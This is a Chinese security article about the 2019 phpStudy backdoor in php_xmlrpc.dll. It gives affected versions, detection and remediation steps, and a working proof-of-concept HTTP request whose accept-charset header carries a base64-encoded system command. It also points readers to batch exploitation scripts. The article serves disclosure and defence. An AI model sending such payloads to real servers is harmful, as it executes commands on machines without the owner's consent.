酷应用

phpStudy后门RCE,复现/批量脚本/修复

技术 作者:有料 2019-10-03 22:30:28

phpStudy后门介绍

phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。
  • 软件作者声明:phpstudy 2016版PHP5.4存在后门。
  • 实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门
据传漏洞形成原因是官网被入侵后植入后门,嫌疑人已被抓。

后门检测方法

手动检查

后门代码存在于\ext\php_xmlrpc.dll模块中,phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径 
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
用记事本打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在
phpStudy后门RCE检测
附后门文件MD5值:

工具检查并修复

官方发布了:phpstudy 安全自检修复程序,可用于2016 2018版本的安全检测与修复,下载该文件一键检查与修复。

phpStudy后门RCE与复现

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
其中要注意的是accept-charset,里边是要执行的命令base64加密。
phpStudy后门RCE验证复现
RCE来源:https://www.cnblogs.com/-qing-/p/11575622.html,来源文章中作者还提供了phpStudy RCE批量与交互脚本,有意自取。

应对措施

  1. 对服务器进项全盘查杀,检查web程序是否存在后门和Webshell,检查操作系统是否有隐藏的账号以及后门。
  2. 使用phpStudy官方发布的自检修复程序进行检查与修复,地址在上面。
  3. 在官网下载全新的phpStudy程序,新版没有后门。

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

*文章为作者独立观点,不代表 爱尖刀 立场
本文由 有料发表,转载此文章须经作者同意,并请附上出处( 爱尖刀 )及本页链接。
原文链接 https://www.ijiandao.com/safe/cto/320597.html
phpStudy PHP
图库
有料 有料
公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接
百度热搜榜
排名 热点 搜索指数
iTrust
AiDeep Ued
关于我们 联系我们 升级日志 法律声明 广告服务 侵删通道
Copyright © 2021 K2CMS All rights reserved.
京ICP备14006288号